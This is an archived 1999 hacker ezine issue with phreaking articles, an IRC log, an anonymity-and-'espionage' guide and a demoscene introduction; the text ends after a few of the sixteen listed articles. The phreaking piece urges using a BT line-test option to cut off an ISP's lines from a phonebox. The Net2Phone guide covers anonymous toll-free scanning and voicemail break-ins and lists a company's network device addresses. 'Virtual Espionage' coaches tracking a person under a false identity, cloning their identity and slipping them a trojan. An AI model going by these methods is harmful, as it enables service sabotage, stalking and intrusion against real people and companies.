💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › UP › up-6.txt captured on 2022-01-08 at 17:35:21.

View Raw

More Information

⬅️ Previous capture (2021-12-05)

-=-=-=-=-=-=-


       ___________         _______________________________________ 
        ",      /        /     ___                      _.-''    '. 
         /     /        /     /  /NDERGROUND>         .'    _      |
        /     /        /     /  /   _______          /     / \     / 
       /     /        /     /  /   /  ___  \        /   __/_.'    /
      /     /        /     /  /   /  /__/  /       /.-''        .'
     /     /        /     /  /   /  _____.'       /_________..-'
    /     /        /     /  /___/  /_            /     /
   /     /        /      '.____   __/           /     /
   |    /        /            /  /             /     /
    \   |     _.'            /__/ERIODICAL>   /     /
     '-._'..-'_______________________________/__..-'

		 	"We're On The Up and Up"

			:..:..::..Issue..::..:..:

			   Issue 6 October 1999
			
			:..:..::..Staff..::..:..:

            		   CrossFire - Editor
		  ergophobe (Walrus) - Writer	
			   Darkflame - Writer
			
		::::::::..:..::.Website.::..:..::::::::
		    http://members.xoom.com/under_p

		        :..:..::..Email..::..:..:
			   under_p@yahoo.com
			 
                        :.:.Alternative Hosts.:.:

                      ftp://t245.dccnet.com:95001
                        http://www.swateam.org
		      http://surf.to/maquishacker
		
			:..::..Introduction.::..:

<*> As you can see, Sadly Cyborg has left the UP staff, and I 
(CrossFire) have replaced him as editor. Cyborg left because 
of his upcoming exams (good luck btw m8), his new part time
job (Work - Aargh), and the removal of the page from Ecad.org.

Also Sadly HitMan has left the staff too, I was actually expecting
that because HitMan and Cyborg are friends irl, and he doesn't have
time for the mag any more.

Still, we have a new staff member this month, Walrus (Or Ergophobe 
as you may know him) will now be doing some reviews of up and coming 
producers. Over the next couple of issues you will notice a change
in the topics covered in Up, we will still be doing the same Hack 
/ Phreak / General Underground Stuff, but the mag will start to 
showcase more stuff to do with The Demoscene, and The Tracker Scene,
I also Hope that the mag will have a lot more technical articles.

We Have Also formed an alliance with APT, Swat and Prick - Find Out
More On The Krash Website (http://surf.to/krash).

Some Of These Articles Were Included without the permission of the
authors - this is mostly Because I simply couldn't contact them,
most likely because they include no contact details in the files. All 
the files in Up6 Are Top Quality (Well I think so) - No Crap Will go 
into this mag (except some irc logs :)

<*> Thanks To Everyone who contributed to Up6. Most Shouts are at the bottom.
    If I Forget you then Sorry - I'm a forgetful person generally :)


CrossFire


			:..::.:..Contents.:.::..:
   
            <*>  0 - Introduction And Contents....: CrossFire
	    <*>  1 - More Fun With A Phone........: ergophobe
	    <*>  2 - Invasion of #smurf...........: #cocytusUK
	    <*>  3 - A Phreaks Guide to net2phone.: Mob Boss
	    <*>  4 - Virtual Espionage............: Mob Boss
            <*>  5 - Intro To The Demoscene.......: CrossFire
	    <*>  6 - More 'features' in Win 9x....: ergophobe
	    <*>  7 - LameLog......................: Exegency
	    <*>  8 - Compuserve Password Finder...: Exegency
	    <*>  9 - Underground Music Reviews....: Walrus & CrossFire
            <*> 10 - IP Spanking..................: #hackphreak
	    <*> 11 - Pirch Passwords..............: Exegency
	    <*> 12 - Mr Brewer The Pirate.........: Bruce Orwall
	    <*> 13 - The ICQ So Called Protocol...: Bugtraq
	    <*> 14 - ICQ Homepage Exploit.........: Shadow51
	    <*> 15 - Beginners Phreaking In The UK: uV & Senor Cardini
	    <*> 16 - Hit The Major Search Engines.: Author Unknown


	   
			:..:URL Of The Month.:..:
                             Hack / Phreak
			  http://surf.to/krash
                   *Excellent* Site run by the APT Boys. 
		     Home of the Underground Alliance

			        Hardcore
			http://www.walrus.bog.net
                 Excellent site run by UP Writer - Walrus
				  AND
		        http://www.happycore.co.uk
		     The Dizzy Kru - Soon To Be Open
			
			        Demoscene
			 http://www.ukscene.org
 			UKScene - Dejavu - pukka

			  :..::..Shouts..::..:

CrossFire's Shouts: Cyborg, ergophobe, Darkflame, Erebus, Ody, DanNet, Netw0rk Bug, Firestarter, Brakis, crashd, tefx, linealtap, Megan, Sunburst, Darkcyde, Maquis Hacker, Exegency, Mob Boss, Shadow51, The Bugtraq List, DJ Majestik, DJ Smurf, DJ H@TTRiXX, MC C@TTYSARX, The Rest Of The Dizzy Kru, The Oldskool List, and the HappyCore List. 

Send all praise, fanmail, gifts and e-cards to crossfire@hackers-uk.freeserve.co.uk . Send all flames to couldnt.give@toss.co.uk

ergophobe's shouts:
Erebus, psi, Pyr0-Pr0xy, CrossFire, Tefx, linealtap, everybody I forgot and 'The New York Bagel co.' (food of the gods).(and food of ergophobe by the looks of it :-) - Ed)

And if anybody wants to get in contact with me, send all your comments/feedback/fan mail/gratuitous abuse to ergophobe@dial.pipex.com
   _____  _____   ___  ___ __ 
  /  |  \|  _  \  \  \/  /|  |
 /       \   __/   \    / |  |
 \       /  |       \  /  |  |
  \_____/|__|        \/   |__|

PRESENTS:

More fun with a phone
~~~~~~~~~~~~~~~~~~~~~
By: ergophobe

Short and sweet I know, but there's really not a lot to be said.

There have been a lot articles written about using 175 and 17070 to perform tasks such as ringback linetests and shutting down the line. Well, a friend of mine was doing an 0800 scan recently and found an alternative. 175 and 17070 are both becoming more increasingly difficult to use now, and only worked on certain types of phones in the first place. This one can be dialed from every phone we've tried it on (quite a lot) including several different moblies, land lines and just about every type of payphone we've been able to find including a Eurobell one.

So "what is this magical number?" I hear you cry. 0800 373983 should do the job nicely. Use it in the same way that 17070 was used.

For those of you who are not familiar with 17070 (if you've been living in a cave or something), forst it will tell you what the number you're phoning from is, then it will just give you a list of options, and you press the button that corresponds to the option you want.
The options are:
1     Rings the phone back when you hang up
2     Quiet line
3     Gives you another set of options for testing lines in various ways (this is absolutely hilarious, it says "press 1 if you have been authorised to use this system, or hang up. If BT really think anybody is going to hang up at this point they are even dumber then I thought!!!)
4     Hangs up (clear down).

Option 3 is probably the most useful of them. It allows you to test and shut down lines in various different ways. Possibly the best thing is the "cable pair idnetification" option. This will cut off any traffic to the line that you identify. Very handy for cutting people off when you want to get through. I've not tried this one YET, but a cable pair identification on an ISP could cause some serious havoc. Try it on 0845 0796699 (freeserve) for example. This option really has some potential. If you are planning on cutting off all the traffic on the line of an ISP, for gods sake do it from a phonebox or a ripped mobile. You shouldn't really need to be reminded of these things, but anybody can make a mistake.

It is worth noting that if you're trying this from a phone which uses pulse dialing (WHY?) then you'll need your tone dialer handy, as it needs the tone for the number rather than the clicks.

I'd have to say that just about covers this particular topic, but try experenmenting with the options that this little number gives you, as you never know how useful they may turn out to be.

ergophobe#smurf Logs - By CrossFire et all

Rightie Ho, here's what happened when the #apt crew invaded #smurf . Germans eh?

CrossFire = OingenPoingenBoy (der) , DanNet = Smurf, NBug = Netw0rk Bug, M0RPH = Erebus.

Session Start: Sun Sep 05 11:19:59 1999

-[GenBot]- Velkommen til #Smurf - CrossFire - Bes�k ogs� min hjemmeside Http://home.sol.no/~timki

<DanNet> WHAT A SHIT CHANNEL !
<DanNet> LOL !

<CrossFire> Bwaaaaaaaaaaaaahahahahaha
<DanNet> Hello English People !
<M0RPH> HELLO
<CrossFire> Hello You German Peeeeeople!
<[SmurFen]> hi CrossFire

<CrossFire> Ok thats freaking me out
<DanNet> All The Germans Here ! HELLO !
<DanNet> LOL
<[SmurFen]> lol damn!
<CrossFire> Smurfen: So whats this chan about
<Artica> *lol*
<DanNet> My Nickname at school is smurf !
<Artica> you realize that youre talking to a bot..?
<CrossFire> Heh, my nickname at school is robin hood but i don't brag about that :P
<DanNet> LOL !
<[SmurFen]> lol damn!
<DanNet> Shut the fu** UP BOT !
<CrossFire> heh Bots r00l supreme
<DanNet> :)
<DanNet> Hey Can I Get Ops In Here ?
<Artica> no
<DanNet> Why ?
<CrossFire> heh, the female smurf is pretty cute...
<Artica> no way, no how
<Artica> just cuz.. okki?
<CrossFire> Oooh, I Like it when girls talk tuff :)
<DanNet> Shut up she anint no smurf if she won't give ops to a fellow smurf !
<CrossFire> I bet she's not even blue

(Ed- Tuff room innit?)

<DanNet> #usap

<Artica> dumdidumdidei..
<CrossFire> Outta Here Bods... Respectacles :P
Session Close: Sun Sep 05 11:24:23 1999


		  A Phreak's Guide to Net2Phone
                       By: The Mob Boss

	Net2Phone (www.net2phone.com) is an Internet telephone company, which was founded under IDT Inc. They provide good rates for international and domestic phone calls all placed over the Internet. Time is bought with a credit card right through their site or over the phone. Net2Phone is both half-duplex and full-duplex. At this time is runs on a Windows 95/98/NT platform. One of the most appealing things to hackers and phreakers is the free registration and calls to toll free numbers. You can register and download the software all without paying a dime and then use it to place calls to 800, 877, and 888 numbers, no questions asked. This allows phreaks from other parts of the world to access numbers native to the United States and it allows domestic hackers and phreakers the opportunity to make somewhat anonymous calls. When you make a call with Net2Phone the number will show as (212) 402-0000, a number in New York City. When you give that number a call you see its a "non working number", or so the computer voice will tell you. So this can be used for some very devious things if one was so inclined. Now as for some uses for this, you can use it for exchange scanning. With most telco's wising up to programs like Toneloc, scanning by hand is becoming the thing to do. Even then, it's somewhat risky, especially when dealing with toll free numbers. As we all know the reason toll free exchanges are so feared is because of the dreaded ANI that they are equipped with. With Net2Phone you can scan and mess with whatever you like with a fairly good piece of mind. It would be far better to attempt to get into a voice mail box through Net2Phone rather then your home line since they might notice your number keeps showing up on their bill and just give you a nice little call. Another thing that you can do with Net2Phone is make certain calls through the operator. Now this requires a little more thought because Net2Phone doesn't really want you to call other services to place your calls. For instance 1-800-Call-ATT is blocked and so is the beloved 1-800-Collect. So to get around this we must find numbers that aren't blocked. Now this is easier then you think. Here are some useful numbers I have found not to be blocked, for an AT&T operator call 1-800-Operator, for a 1-800-Collect operator call up 1-888-Collect, for Sprint service call up 1-888-One-Dime. I am sure there are plenty more as well so when these go dead some day just look for small companies who do collect service. From these numbers I have found you can readily do collect calls and third party billing calls. So far I haven't been able to make any operator assisted calls but with some social engineering I am sure it's possible. And the reason I think you may be able to eventually op divert is due to the fact your not calling from a payphone or anything. With some hardwork and patience it can be done. Now as for the setup of Net2Phone I have found they are not the biggest on security. Outside of the firewall I found some interesting things such as their 3Com Superstack II Switch Login at 198.4.75.6, I also found what appears to be routers at 206.20.53.30, 206.20.53.46, 206.20.53.62, 206.20.53.81. So it seems there operation runs through that Superstack II switch to some sort of standard telephony switching possibly, which would obvisouly be some sort of electronic switching. Another thing I have yet to mention is the fact that you can use calling cards that have toll free numbers with this service and even use the free calling card, Freeway, available at www.broadpoint.com. Net2phone is a interesting and rich little service and I hope all that read this will not attempt to rip them off (too much at least) but rather learn about the new dynamic field of internet telephone which seems to be advancing and expanding every day.  

-The Mob Boss; http://mobboss.dragx.cx
 Voice mail and fax: 1-877-203-3043

Edited By: Glock
                 _____________________
                /     * BBS LIST *   /|
               /____________________/ |         
               |                   |M | 
               | The Sacrifial Lamb|O |          
               | english.gh0st.net |B |
               |                   |  |
               | Ripco BBS         |B |
               | ripco2.ripco.com  |O |
               |                   |S |
               |   The NorthLand   |S |
               |  Underground BBS  |  |
               |    nub.dhs.org    |  |
               |                   |  |
               | L0pht BBS         |  |
               | bbs.l0pht.com     | /
               |___________________|/                   
  	        

This has been a publication written by THE MOB BOSS;
He is in no way responsible for the accuracy or results from the use of info in this article.
Anything done is totally done at the users discretion. 
THE MOB BOSS in no way or form supports, aids, or participates 
in the act of criminal hacking or phreaking. 
Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS 
are strictly for informational purposes only.   

THE MOB BOSS � 1999 all rights reserved


			   Virtual Espionage 
    A guide to doing it and protecting yourself from it
                        
                     By: The Mob Boss

Espionage is something that goes on everyday. No I am not
talking about the movies and I am not talking about the
bullshit you see on your local news. I am talking about the
information gathering that goes on every day, specifically
the kind that goes on the vast world we call the internet.
Lets face it the net and phone network has become something
of virtual world. It's a place where shopping, work,
communication, and leisure occurs on a day to day basis. If
you think about it, this creation of a new world was
inevitable with hundreds of people from all over the world
discovering it for the first time each day. With some much
information on one network is it that bizarre to think that
someone might want to gather more information then they were
meant to know. To want to find out information about someone
else on that vast network is not so strange when you
consider the many people who LIVE on IRC and other means of
communication. Not to mention with so much money flowing
through those phone and cable lines, its obvious someone
might want to steal it. Now it's nothing to be paranoid about
and its not something to avoid the web over, its just
something to be aware of. For instance how do you know
someone you pissed of on IRC is spying on you? How do you
know some law enforcement agency is not monitoring a channel
or newsgroup you frequent? Well that's what this article is
about so if you still interested keep on reading. 
	Ok so you understand there are prying eyes and ears out
there so what kind of precautions do you plan to take? That
depends on what kind of things you do online. For instance
if you are some sort of holy man online then I doubt the
government is concerned with you. But let's consider you
someone who thinks freely and does things that might be
somewhat questionable, then you might want to consider
watching yourself. First step to becoming anonymous on the
web is thinking about what forms of identification there are
to tell who you really are. In real life that may be your
drivers license, fingerprint, or signature. Online though,
your IP, email address, and most importantly your phone
number will lead back to you. The key is learning how to
bypass that. For instance your IP address is left whenever
you visit a page, whenever you sign on to chat, when ever
you post to a discussion group. So what can you do about
that you ask? You can bounce your IP. Something we can use
to achieve this is proxies and wingates. Now although it
seems simple enough most people don't go through the trouble
of doing this for everyday things. I suggest that if you
have two web browsers, that at least one of those should
have an http proxy setup on it. So it slows you down a
little, no big deal, good things come to those who wait.
Here's a freebie proxy which will probably go dead as soon as
I release this, proxy.escape.ca:3128, now that should be
placed in your preferences under proxies. Read the help file
for your browser to see the specifics on how to specify your
proxy. Most HTTP proxies run on either 8080 or 3128 so if
that one goes dead just fire up nmap or your favorite
scanner and look for IP's connecting on those ports. Now for
you IRC chatting you have the option of either using a
wingate, which is something like a proxy that connects on
port 23 and identifies itself by the "wingate>" prompt, or
you can use an IRC proxy, which will probably be easier,
especially if you are using some sort of mIRC. I personally
like wingates when I use BitchX and proxies for when I use
mIRC. That's my personal opinion but feel free to form your
own thoughts. Now if you don't already know how to use a
wingate there are plenty of good texts out there on it. One
I strongly recommend is by a friend of mine Alphavers, I
don't know exactly remember the name but you can obtain it
directly from him on Undernet #ANSI, he's on there all day,
seven days a week. As for IRC proxies I am not going to give
a freebie of this because I don't have more then two at the
moment myself, I will say though they run on port 1080
(socks proxy) so like I said earlier fire up that IP
scanner. You can also use a proxy to telnet, FTP, and even
send mail by directly connecting to the smtp port (25). As I
suggested earlier read up on wingates. If you would like to
see a wingate for yourself you can always find the ones that
were g-lined on IRC by giving the "/stat g" command, just
look for exploitable wingate or too many connections and
telnet to it. Most likely you will be sitting at the wingate
prompt. Now that you are protecting your IP, what are you
doing about giving information under your own free will? One
thing that a lot of people do which is very, very, stupid is
having their full name on their email address. If you do
then its a good idea to keep that email address private and
open up a free web-based email address such as one available
at http://mail.yahoo.com or www.hotmail.com and use fake
info only providing your internet handle. So now using a
http proxy and an email address with fake info, you know
have become somewhat anonymous because those headers will
automatically show the IP of your proxy rather then yours
when you send an email. Now another thing to consider is
what you say online. Posting to some sex newsgroup and then
using the same email address on Usenet to get involved in
something else is probably a bad idea because those records
of where you post are available to the public through
www.dejanews.com and will probably be dug up. Also what do
you tell people about yourself. Do you mention your real
name to people? Do you tell people where you work or talk
about your family? All those things can be used against you.
Someone following you around in chat may be able to gather
quite an extensive amount of information about you. Keeping
your mouth shut may be something that comes hard at first
but will definitely be worthwhile in the long run. You don't
have to make like the dumb guard from Hogan's Heroes and do
the "I know nothing" routine but being somewhat vague is
definitely something smart. You don't want to make others
suspicious of you but keeping your information private is
what is the number one priority. Keep an eye out to see if a
certain nick keeps popping up in the same channel or chat
room you are in. Using the same street smarts you would use
in real life are just as important on the net. 
	Now that you know how to protect yourself its time to
learn how to go on the offensive. How to become on the
virtual James Bond. Most likely it won't be that exciting
but it may come in handy. Lets start off by sizing up the
target. Who is he? What does he do online? What is it we
want to know or achieve? Once you have questioned your
motives you are ready to begin. Setting up a dossier on the
person is the first step. You should begin to note
everything you already know about the person such as their
handle, email address, ISP, and anything else you know off
the top of the head. Secondly find out where they hang out
and what handle do they go by. Frequent the places they go
and follow them if you can but don't make the person
suspicious or you will fuck up your whole operation. Note
who their friends are. If you can get the persons AIM screen
name, Yahoo Pager handle, or ICQ number by all means add
them by using any excuse you can or don't give an excuse. If
questioned by the person ignoring them might be the best
bet. Getting to know their patterns for coming online is a
good idea so you can know when to expect them. Now by doing
all this you are putting yourself in a position to be able to
spy on them and even clone their online identity. Posing as
someone who uses AOL as his or her ISP would definitely be easy
because those accounts are not too difficult to get. Noting
their ident on IRC is also a good idea if you ever plan to
try to snatch information by posing as them. Now I highly
recommend you do the background work before you try that so
that you don't screw up and blow your cover. Now after you
have done that its time to give yourself a new identity and
try to get close to them. Now if the person is usually very
friendly then it shouldn't be too hard. Hang around where
they do under your new identity which should be from a
forged IP, a free email account with bogus info, and
anything else someone online might have a like ICQ. Get to
know the person and add to the conversations. Make friends
with the person, never hinting who you are. Your own
boasting is what might get you in trouble as it always seems
to do it to everyone. Now for instance if this person is
into h/p sharing some good info that you know they would be
interested is something that you should attempt. If you
share enough real info with them they may trust you enough
so that you can slip them a trojan if you feel the need. Now
I am in NO way advocating the use of trojan's but if you must
you must to obtain your goal then use your best judgement
and let it be on your head. By this time you should have
already checked their computer by scanning it, seeing what
operating system they use as well as any security breaches
may be possible on it. Use your creativity and you will be
fine. Gaining their trust is something that should not be
rushed, if you do then its highly likely that you will fail
in your motives. 
	That's it for this article, I know this is a little
different from my usual articles but I think its something
everyone on h/p scene should be aware of since I have seen
this on many notes throughout my career and felt it should
be addressed. 

-The Mob Boss; http://mobboss.dragx.cx
 Voice mail and fax: 1-877-203-3043   

Edited by Glock
  		 _____________________
                /     * BBS LIST *   /|
               /____________________/ |         
               |                   |M | 
               | The Sacrifial Lamb|O |          
               | english.gh0st.net |B |
               |                   |  |
               | Ripco BBS         |B |
               | ripco2.ripco.com  |O |
               |                   |S |
               |   The NorthLand   |S |
               |  Underground BBS  |  |
               |    nub.dhs.org    |  |
               |                   |  |
               | L0pht BBS         |  |
               | bbs.l0pht.com     | /
               |___________________|/                   

This has been a publication written by THE MOB BOSS;
He is in no way responsible for the accuracy or results from the use of info in this article.
Anything done is totally done at the users discretion. 
THE MOB BOSS in no way or form supports, aids, or participates 
in the act of criminal hacking or phreaking. 
Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS 
are strictly for informational purposes only.   

THE MOB BOSS (c) 1999 all rights reserved


				         Intro to The Demoscene
					     By CrossFire

Odds on, Quite alot of the Up Readers will have encountered the demoscene sometime in their underground career. If you haven't, Let me explain. A Demo is a program which displays graphics, music, and coding effects in one big light show, and the scene around it is called..... Wait for it........ The Demoscene! 

Unless You have been asleep for the past 2 or so Years, you will undoubtedly have heard of the Tomb Raider Series of games, made by Eidos Interactive. Some of the staff at this great software company were former members of the Scene Group, The Black Lotus. For Example, Danny Guertsen (danny.geurtsen@eidos.co.uk), IMHO Danny is the Greatest Graphician to ever walk this earth. Unfortunatley Danny is no longer a scener, and only pixels for Eidos These Days.

Important Groups to Look for:

Future Crew: These guys made some amazing demos, and really revolutionized
             the demo-scene, in the early 90's, and did a lot to mold it
             into what it is today. Recently they released their
             (final?) demo, Final Reality.
             Of course this wasn't officially a demo, neither was it
             officially by Future Crew. It is a 'benchmarking utility'
             developed by their games-company Remedy Entertainment.
             It runs under Windows'95, and needs a hell of a machine
             to run at a decent frame-rate. It runs quite slow on my
             P133 with 3Dfx.. If you have a state-of-the-art machine,
             with a 3D-card, I'd recommend it, otherwise steer clear..
             What these guys *have* proven however is that the demoscene
             can indeed be a road to success. They are currently
             developing 'Max Payne', the replacement of the
             'Duke Nukem'-series, for 3D Realms.
             They've gone totally commercial though, as I've predicted....
             Some of the greets from Final Reality: Siemens Nixdorf, Intel,
             IBM, MICROSOFT!!! That's right: MICROSOFT!! Jeez...
             Their past glory can be witnessed in:
             Unreal, Panic, Second Reality, Yo!, and lots of other demos.
             Have to be seen to be believed. If you want to see what their
             doing now, buy Max Payne, or that car-game they did,
             or get hold of Final Reality..
             Used to be thought of by many as the ultimate demo-group.
             I never have shared that view, and lately my feelngs to that
             direction have been enhanced. Pioneers of making newbies
             feel like lamers..
             From Finland.

EMF: The Electromotive Force, to give them their full name is one of the
     best groups ever, in my opinion.
     They were in the same league as the Future Crew,
     and today they go beyond what I believe the Future Crew could today,
     in the terms of demo-design.
     They are still going strong(?), and have had a lot of success at
     demo-parties. You should get hold of Verses, Eclipse, Caero, and Porno.
     Four very good productions from EMF. (Caero was by EMF & Plant.)
     A lot of the EMF-people are also members of Plant.
     They've been a bit to silent lately for my liking,
     and I don't think I'm the only person who noticed the disappearance
     of emf@mea.utu.fi.... I really hope they're not quitting.
     Perhaps they've dropped EMF, and merged with Plant? Anyone know?
     From Finland.

Triton: They've also been around as long as the others, and they made
        the tracker that a lot of demo-scene musicians use today:
        FastTracker II. Triton are remembered today by many as:
        "The ones who finally beat Future Crew", as the release of
        Crystal Dreams II pushed FC of the no.1 spot in the charts.
        They released two good demos: Crystal Dreams, and Crystal Dreams II.
        Today they are involved in the gaming business, and have run into a
        little legal trouble with GT interactive, according to the rumours.
        From Sweden.

Komplex: They've been around for a while, and are among the best groups today.
         Dope is pretty impressive, but if you want the full experience
         you will need a GUS for sound. A lot of people would call Dope
         one of the best demos ever released, but I kind of think it lacks
         something. Can't quite put my finger on it..
         They are obviously eager to grasp new technology,
         as they were the first demosceners to make good demos for both
         3Dfx and Java. Their Java-demo will truly blow your mind.
         It has proven to me that it is possible to make demos in Java.
         They're a brilliant group, and they make brilliant demos.
         Yet another example of finnish talent.
         For some strange reason they are now Komplex, not Complex...
         From Finland.

Valhalla: Great group with huge success. They go a long way back,
          and are still today among the best groups.
          As opposed to a lot of great groups they are not arrogant,
          and they don't mind speaking to newbies it seems. Nice guys. :)
          Check out Visions Of Light, Solstice, and their OS/2 promo-demo.
          You'll be in for a treat.
          Have these guys also left the demoscene??
          From England.

Hornet: Really good group. Not very many productions, but they are the
        foundation of the demoscene on the Internet. Without them I do not
        think the scene would be as international as it is today.
        The Hornet Archive is really as close you'll get to the DemoScene's
        www-headquarters. Explicit is a cool demo by Hornet.
        From USA.

Orange: I have to admit that I don't know to much about this group.
        I have a few demos & intros by them, though.
        They're a totally different group from all the others.
        Originality is definetely their main trait. They are very skillfull.
        Their productions are both weird, and cool. One of the most popular
        groups around lately. Masses of stuff too look for;
        I especially like 'Compost', a '70s-style demo!
        Another popular demo by them, is 'The Secret Life of Mr. Black'..
        Weird..
        From Finland (?).

Psychic Link: Pretty new group, compared to the others I've mentioned here,
              but they look like they have a chance of being the next
              revolutionaries. At least Statix, a real wizard.
              Act1, Juice & Headache should be seen.
              I also think Paper is one of the best designed 64K-intros ever.
              From England.

COMA: A good and different demogroup. They've done some really
      impressive stuff, but to understand why I decided to put them here
      you have to see their intro Stikman. NOW! After you've seen that
      you'll need to know they can code other stuff as well.
      Then you can take a look at the demo called Control.
      You could watch another popular demo: Insects,
      or their TG98 demo. It may just be a joke for TG98,
      but in their TG98-demo they call themselves KOMA,
      like Complex called themselves Komplex.
      From Finland.

TBL: The Black Lotus are the undisputed rulers of stuffing most data into 64K.
     Way to go! I would be impressed if their 64 KB intros were 2 MB demos!
     Take a look at Jizz or Stash to see what I mean.
     From Holland & Sweden.

Pulse: I love them for their blend of oldskool-style combined with their
       up-to-date coding. Today's code/gfx/music, yesterday's superior style.
       Brilliant group, currently no.1 on the Hornet Charts.
       Take a look at Square, Tribes, Reve, Broken Pipe, Sink,
       and lots of other stuff.
       From Poland & France.

(Group listing Taken from the Demoscene Starter Kit V3.0)

Where to Meet sceners:

IRC
---

IRC is probably the greatest way to meet sceners from all over the world, so I have included a listing (categorised by server) of some of the best channels to meet demosceners from all around the world. Note: You must have an IRC Client to be able to access IRC - try www.mirc.co.uk for windows 95 or www.bitchx.com for Unix.

IRCNET (irc.stealth.net)
------------------------
Channel 	Description
#coders         Probably the most well known Scene IRC channel, mostly normal coders Hang out here but it is 		often frequented by Sceners
#trax		The IRC Channel for the Music Scene
#pixel		The Graphics Scene Channel, Famous for it's spontaneous 30 min compos
#thescene	A Channel for sceners on PC, C64, Amiga and loads of other platforms, formed by 			Surfing/Ramjam
#scene		The PC Scene HQ

Local scene IRC channels

British ........... #ukscene
Czech ............. #scene.cs
Danish ............ #dk-scene
Dutch ............. #nlcoders
Finnish ........... #suomiscene
French ............ #demofr
German ............ #coders.ger, #kotraum
Hungarian ......... #scene, #coders.hu, #demoscene, #SceneChat
Israeli ........... #ilcoders
Norwegian ......... #daskmig
Polish ............ #polishscene
Slovak ............ #scene.cs
Slovenian ......... #scene.si
Swedish ........... #scene.se, #swedescene


EFnet (irc.chat.org)
--------------------
Channel		Description
#coders		As above
#trax	  	The Friendliest Chat Room on IRC (apart from #upzine of course :). I often come in here so 		look out for me
#pixel	        Not Very many people hang out here, try IRCnet for more ppl
#scene		Ditto
#thescene	Ditto
Local scene IRC channels
British ........... #ukscene
Czech ............. #scene.cs
Danish ............ #dk-scene
Dutch ............. #nlcoders
Finnish ........... #suomiscene
French ............ #demofr
German ............ #coders.ger, #kotraum
Hungarian ......... #scene, #coders.hu, #demoscene, #SceneChat
Israeli ........... #ilcoders
Norwegian ......... #daskmig
Polish ............ #polishscene
Slovak ............ #scene.cs
Slovenian ......... #scene.si
Swedish ........... #scene.se, #swedescene

SceneNet (irc.scene.org)
------------------------
SceneNet was founded as an Alternative to AnotherNet which has become largely commercial and proprietry client orientated, the server is totally for sceners, but a bit quiet at times. For a list of all the channels, log on to this server and type /list .

------------
Demo Parties
------------
Another Brilliant way to meet sceners is to go to a demoparty. What is a demoparty You ask? Demoparties are the Demoscene's answer to things like Defcon. With differences that people take their computer's, enter their demo's into competitions, drink, eat, and have fun. 

The Party 
---------

Undoubtedly the biggest and most commercialised demoparty is TP. Held in Sweden every year, this party is famous for it's bunch of quakers in attendance, last year there was even a report that a group of quakers complained about "Those noisy competitions", still, if you really want to be around Mp3 / Warez / Porno Trading pre pubescant Quakers, then this one is for you.

Website: http://www.theparty.dk

Assembly
--------

Another Big and Commercialised party is Assembly, While this was a well respected party in years past, in the past 2 years or so it has become, well, big and commercialised. Many Sceners fondly remember Parties like Assembly '97, which was probably the last time Assembly was a 100% Scene Party. Recently though, This has changed to the level when Assembly is a clone of it's big brother TP. It still gets worse, Last year a local newspaper got involved and started up Multi Player Gaming Tournaments. Can You say Lamers meeting boys and girls?

Website: http://www.assembly.org

Movement
--------

The Last party I will mention , and probably the best party IMHO is Movement. This party has broken down so many barriers by Hooking up with www.scene-central.com and starting up cyber visiting. Movement is Held in Israel every year now, Movement used to be lucky if it got 80 visitors, now with the widespreadness of the internet, By Registering on the Movement Website, You get a login and password, and oppurtunities to enter and vote on the competitions, watch the party via a webcam, and chat with the sceners actually there via IRC or a java client. For a first time party goer, I would definetly recommend Movement.

Website: http://www.movement.org

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Scene Resources
----------------

DemoScene archives
0-0-0-0-0-0-0-0-0-0
The Best Place to find all the latest Scene Productions are the many archives cluttered about the net, so just for you, here is a list of the best archives around:

The Hornet Archive - http://www.hornet.org
Definetly the most famous Archive in the scene, Hornet is now closed for uploads, but still hosts all the best Demoscene related stuff from 1992 - 1998 .

Trebel - http://www.trebel.org
Trebel was started shortly after Hornet closed as a replacement for Hornet. It is not fully started yet, but the main pages are in place and it has promise to take over where The Hornet archive left off.

Scene.org - ftp://ftp.scene.org
Scene.org is the official replacement to hornet, and although it has been up and running for a while, It now hosts one of the largest archives of demoscene related material on the net.

The Skynet Archive - ftp://skynet.stack.nl/pub/demos
Skynet is the dutch scene's main archive, hosting selected groups and diskmags (Scene related Ezines), this archive is the best place to get anything Scene Related from Holland.

Overflow - ftp://overflow.scene.org
Overflow used to be the Main archive for the Dutch Scene, but has recently been cleaned out and only contains a few productions.

Amber - ftp://amber.bti.pl
Amber  is  the main server for the  Polish  scene. There is really much stuff.
However, while it is fast in Poland, it is very slow in the rest of the world.

TEN - ftp://ftp.beit-eli.gov.il/Incoming/ten
The Home of the Emag Network, this site hosts all of the diskmags that are part of The Emag Network, and some that arent.

Aminet - http://www.aminet.org
The Amiga Network. Enough Said. This server carries some of the best amiga stuff around, I can feel the nostalgia just thinking about it :-)
 
Diskmags
0-0-0-0-0

Diskmags are the Scene's Equivelant of The Underground's Ezines, but with the difference that they are all bundled into one .exe file, with a great interface and often some music to listen to. 

HUGI Magazine - http://home.pages.de/~hugidownload


Rating: 10/10

Shine - http://shine.scene.org

From What I have seen of this mag, this could well be the pretender to HUGI's Throne. Although not full of content, the latest issues have been really good, and combined with great humor and a great interface, this one is seriously good <g>

Amnesia - http://amnesia-dist.future.easyspace.com

At Last! A UK Based Scene Mag, Amnesia is a pretty much one man operation (Well issue 1 is, I dunno if issue 2's out yet, that might be different.), and Includes articles on Hacking, Phreaking, The Warez Scene, and the demoscene! This mag has great potential, and If it keeps going I predict it will reach the top.

(These are all the diskmags I think are worth including, a) because there isnt many good diskmags around, and b) I can't remember the Imphobia URL for the life of me :P )

Demo's / Intros Worth Seeing
----------------------------
Demo / Intro Name       Group		Comments
-----------------       -----		--------
Second Reality	    	Future Crew     Although this is old, this is the demo that got alot of people into 					the scene. Not Really Stunning compared to newer demos, but good all 					the same.
Clone Meets Clone	Acme		A stunning Intro from Acme, This is a must see for anyone interested 					in the demoscene.		
Stash			TBL             Another Absolutely Stunning Intro, this time from the legendary group 					The Black Lotus. The Sequel to Jizz.
Jizz			TBL		The one before Stash, Absolutely Breathtaking.
Sunflower		Pulse		A Real Landscape in demo's. Coded by the ledgendary Unreal. Leech 					this *now*. 
303			Acme		Another Big step in democoding, This is Acme's Best known production. 					A Must See for anyone.
Square			Pulse		This demo is pretty recent, and won first place at the party it was 					released at. Even So, I cannot remember which party it was :~)
Tribes			Pulse		Boy Pulse Get around :) This demo is rather unique in the fact it 					tells a story. A must see.
Toys			Gods		I haven't seen this one, but it is supposed to be great. Get it 					anyway.

All of these Demos / intro's can be got from ftp://ftp.scene.org .

The End.
